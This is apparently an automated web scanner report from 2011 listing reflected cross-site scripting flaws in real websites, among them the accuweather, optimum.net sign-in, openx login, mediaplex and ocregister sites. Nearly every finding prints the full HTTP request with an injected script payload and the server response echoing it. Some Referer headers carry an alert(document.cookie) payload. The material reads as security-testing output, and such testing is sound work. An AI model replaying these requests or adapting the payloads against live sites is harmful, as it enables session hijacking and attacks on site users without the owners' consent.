<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/ ...[SNIP]... ="text/javascript"; script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.nydailynews.com%2Fnydailynews%2Fmarkets%3FHTTP_HOST%3Dfinance.nydailynews.com%26HTTPS%3Doff%26f4164'-alert(1)-'4231e0dc656%3D1&Type=page&Client=nydailynews&rand=' + Math.random(); head.appendChild(script); </script> ...[SNIP]...
3.53. http://hurricane.accuweather.com/hurricane/index.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hurricane.accuweather.com
Path:
/hurricane/index.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9264"><script>alert(1)</script>f56711c46f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hurricane/index.asp?e9264"><script>alert(1)</script>f56711c46f8=1 HTTP/1.1 Host: hurricane.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Type: text/html Cache-Control: public, max-age=300 Expires: Mon, 28 Feb 2011 13:37:21 GMT Date: Mon, 28 Feb 2011 13:32:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 81746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a rel="nofollow" href="/hurricane/index.asp?e9264"><script>alert(1)</script>f56711c46f8=1&unit=f"> ...[SNIP]...
3.54. https://idcenter.services.optimum.net/Services/Process/ID/SignInByAccountNumber [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://idcenter.services.optimum.net
Path:
/Services/Process/ID/SignInByAccountNumber
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fc70"><script>alert(1)</script>1f54413b89f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Services/Process/ID/SignInByAccountNumber?2fc70"><script>alert(1)</script>1f54413b89f=1 HTTP/1.1 Host: idcenter.services.optimum.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67ce4"%3balert(1)//8ecfa08801b was submitted in the mpck parameter. This input was echoed as 67ce4";alert(1)//8ecfa08801b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-3443-5%3Fmpt%3D467911467ce4"%3balert(1)//8ecfa08801b&mpt=4679114&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/3/0/%2a/f%3B235501499%3B0-0%3B2%3B46690141%3B3454-728/90%3B40433253/40451040/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3f HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/idge.cso.zone/module;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;type=module;ord=9537889300845564? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=15017:3443/12309:25586/1551:17023/12525:37966/14960:18534
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:19:42 GMT Server: Apache Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT ETag: "43e67e-bfe-49a4c7ee56f00" Accept-Ranges: bytes Content-Length: 5841 Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48b03"%3balert(1)//04850f7d9e7 was submitted in the mpvc parameter. This input was echoed as 48b03";alert(1)//04850f7d9e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-3443-5%3Fmpt%3D4679114&mpt=4679114&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/3/0/%2a/f%3B235501499%3B0-0%3B2%3B46690141%3B3454-728/90%3B40433253/40451040/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3f48b03"%3balert(1)//04850f7d9e7 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/idge.cso.zone/module;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;type=module;ord=9537889300845564? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=15017:3443/12309:25586/1551:17023/12525:37966/14960:18534
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:19:52 GMT Server: Apache Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT ETag: "43e67e-bfe-49a4c7ee56f00" Accept-Ranges: bytes Content-Length: 5817 Content-Type: application/x-javascript
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b5c"%3balert(1)//ee926a3b294 was submitted in the mpck parameter. This input was echoed as a1b5c";alert(1)//ee926a3b294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15017/122387/336x280_new_owl_USA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-122387-13113-0%3Fmpt%3D4675442a1b5c"%3balert(1)//ee926a3b294&mpt=4675442&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/3/0/%2a/b%3B236454318%3B0-0%3B1%3B46690141%3B4252-336/280%3B40707159/40724946/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3f HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=15017:13113/12309:25586/1551:17023/12525:37966/14960:18534
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:19:38 GMT Server: Apache Last-Modified: Fri, 11 Feb 2011 16:27:00 GMT ETag: "4ae122-bf6-49c042ae07d00" Accept-Ranges: bytes Content-Length: 5859 Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88336"%3balert(1)//79eacfeff02 was submitted in the mpvc parameter. This input was echoed as 88336";alert(1)//79eacfeff02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15017/122387/336x280_new_owl_USA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-122387-13113-0%3Fmpt%3D4675442&mpt=4675442&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/3/0/%2a/b%3B236454318%3B0-0%3B1%3B46690141%3B4252-336/280%3B40707159/40724946/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3f88336"%3balert(1)//79eacfeff02 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=15017:13113/12309:25586/1551:17023/12525:37966/14960:18534
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:19:40 GMT Server: Apache Last-Modified: Fri, 11 Feb 2011 16:27:00 GMT ETag: "4ae122-bf6-49c042ae07d00" Accept-Ranges: bytes Content-Length: 5835 Content-Type: application/x-javascript
3.59. http://isp.thelist.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://isp.thelist.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8c34c--><script>alert(1)</script>e5c1c493f3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8c34c--><script>alert(1)</script>e5c1c493f3c=1 HTTP/1.1 Host: isp.thelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:32:39 GMT Server: Apache Cache-Control: max-age=60 Expires: Mon, 28 Feb 2011 13:33:39 GMT Connection: close Content-Type: text/html Content-Length: 43615
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE> <META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /?8c34c--><script>alert(1)</script>e5c1c493f3c=1 --> ...[SNIP]...
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload dd2c2<script>alert(1)</script>09c42f25639 was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=757&ct=CSO_HP_ROSdd2c2<script>alert(1)</script>09c42f25639&tr=MARKETPLACE&num=3&layt=1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 28 Feb 2011 12:46:08 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 28 Feb 2011 12:46:08 GMT Content-Type: application/x-javascript Content-Length: 81
// Error: Unknown old section CSO_HP_ROSdd2c2<script>alert(1)</script>09c42f25639
3.61. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jlinks.industrybrains.com
Path:
/jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b41f<script>alert(1)</script>1ee244d5308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=757&ct=CSO_HP_ROS&tr=MARKETPLACE&num=3&layt=1&fmt=simp&7b41f<script>alert(1)</script>1ee244d5308=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 28 Feb 2011 12:46:09 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 28 Feb 2011 12:46:09 GMT Content-Type: application/x-javascript Content-Length: 69
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload e8385<script>alert(1)</script>9537fda7bc0 was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=757&ct=CSO_HP_ROS&tr=MARKETPLACEe8385<script>alert(1)</script>9537fda7bc0&num=3&layt=1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 28 Feb 2011 12:46:09 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 28 Feb 2011 12:46:09 GMT Content-Type: application/x-javascript Content-Length: 86
// Error: Site 757 has no section MARKETPLACEe8385<script>alert(1)</script>9537fda7bc0
3.63. https://login.openx.org/sso/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.openx.org
Path:
/sso/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bd3b"><script>alert(1)</script>817fa1e628f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sso/login?7bd3b"><script>alert(1)</script>817fa1e628f=1 HTTP/1.1 Host: login.openx.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 28 Feb 2011 13:32:29 GMT P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: JSESSIONID=0DE430F759ED88703184640BD42AC197.tomcat3; Path=/sso; Secure Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 5444 Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <form id="login-form" method="post" action="login;jsessionid=0DE430F759ED88703184640BD42AC197.tomcat3?7bd3b"><script>alert(1)</script>817fa1e628f=1"> ...[SNIP]...
3.64. http://michellemalkin.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://michellemalkin.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deaf9"><script>alert(1)</script>b1038fd8049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as deaf9\"><script>alert(1)</script>b1038fd8049 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?deaf9"><script>alert(1)</script>b1038fd8049=1 HTTP/1.1 Host: michellemalkin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:32:35 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding X-Pingback: http://michellemalkin.com/wp/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xf ...[SNIP]... <a href="/?deaf9\"><script>alert(1)</script>b1038fd8049=1&print=1"> ...[SNIP]...
3.65. http://nydailynews.stats.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nydailynews.stats.com
Path:
/fb/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae06"><script>alert(1)</script>85366a59e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb/scoreboard.asp?cae06"><script>alert(1)</script>85366a59e58=1 HTTP/1.1 Host: nydailynews.stats.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Cache-Control: private, max-age=10 Date: Mon, 28 Feb 2011 13:32:40 GMT Content-Length: 12806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d0ad"><script>alert(1)</script>6095da0146d was submitted in the REST URL parameter 5. This input was echoed as 6d0ad\"><script>alert(1)</script>6095da0146d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/688106d0ad"><script>alert(1)</script>6095da0146d/ HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 13:33:44 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:33:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 59978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/688106d0ad\"><script>alert(1)</script>6095da0146d/feed/" /> ...[SNIP]...
3.67. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e45"><script>alert(1)</script>f73dd9d85d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60e45\"><script>alert(1)</script>f73dd9d85d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?60e45"><script>alert(1)</script>f73dd9d85d5=1 HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:33:04 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 111529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... " title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?60e45\"><script>alert(1)</script>f73dd9d85d5=1feed/" /> ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64d5c'-alert(1)-'bb8b0913587 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /play.html?code=19842;6812;5711;0&from=64d5c'-alert(1)-'bb8b0913587 HTTP/1.1 Host: optimized-by.simply.com Proxy-Connection: keep-alive Referer: http://www.googlebig.com/.../en-xss-guide-how-fix-xss-vulnerability-t-195.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 14:04:04 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0 P3P: CP='NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR NAV INT PRE' Set-Cookie: ToBeValidatedFrom=64d5c'-alert(1)-'bb8b0913587; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:07 GMT; Path=/ Set-Cookie: ToBeValidated=http://www.googlebig.com/.../en-xss-guide-how-fix-xss-vulnerability-t-195.html; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:07 GMT; Path=/ Set-Cookie: ad_simply_viewer=a7403c74-1385-4711-814e-7bccfbad72de; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:07 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 924
3.69. http://optimized-by.simply.com/play.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://optimized-by.simply.com
Path:
/play.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b78'-alert(1)-'32df7692c67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /play.html?code=19842;6812;5711;0&from=&e6b78'-alert(1)-'32df7692c67=1 HTTP/1.1 Host: optimized-by.simply.com Proxy-Connection: keep-alive Referer: http://www.googlebig.com/.../en-xss-guide-how-fix-xss-vulnerability-t-195.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 14:04:10 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0 P3P: CP='NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR NAV INT PRE' Set-Cookie: ToBeValidatedFrom=; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:10 GMT; Path=/ Set-Cookie: ToBeValidated=http://www.googlebig.com/.../en-xss-guide-how-fix-xss-vulnerability-t-195.html; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:10 GMT; Path=/ Set-Cookie: ad_simply_viewer=85931e07-07d9-48c0-bfe8-054bf5eed928; Domain=.simply.com; Expires=Mon, 07-Mar-2011 14:04:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 927
The value of the Context request parameter is copied into the HTML document as plain text between tags. The payload 96e91<script>alert(1)</script>030f8640de8 was submitted in the Context parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/Frs.frs?Context=LOGENTRY96e91<script>alert(1)</script>030f8640de8&Source=csozne&Source_BC=10&Script=/LP/50552781/reg&_from=cso HTTP/1.1 Host: reg.accelacomm.com Proxy-Connection: keep-alive Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 12:44:47 GMT Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 14:44:47 GMT; Path=/ Set-Cookie: JSESSIONID=6FC9B6B6BB8080C11021F6CC786504BE; Path=/ Content-Type: text/html; charset=UTF-8 Pragma: no-cache Cache-Control: no-cache, no-store, no-transform Expires: -1 P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC" Connection: close Content-Length: 1224
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]... <font style="COLOR:000000; FONT: 8pt/11pt verdana">java.lang.Exception: Unable to find context LOGENTRY96e91<script>alert(1)</script>030f8640de8</font> ...[SNIP]...
The value of the Script request parameter is copied into the HTML document as plain text between tags. The payload c977d<script>alert(1)</script>40099239016 was submitted in the Script parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/50552781/regc977d<script>alert(1)</script>40099239016&_from=cso HTTP/1.1 Host: reg.accelacomm.com Proxy-Connection: keep-alive Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 12:44:47 GMT Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 14:44:47 GMT; Path=/ Set-Cookie: JSESSIONID=BCC35E50ADF79E8400F2E897678BBE9E; Path=/ Content-Type: text/html; charset=UTF-8 Pragma: no-cache Cache-Control: no-cache, no-store, no-transform Expires: -1 P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC" Connection: close Content-Length: 1240
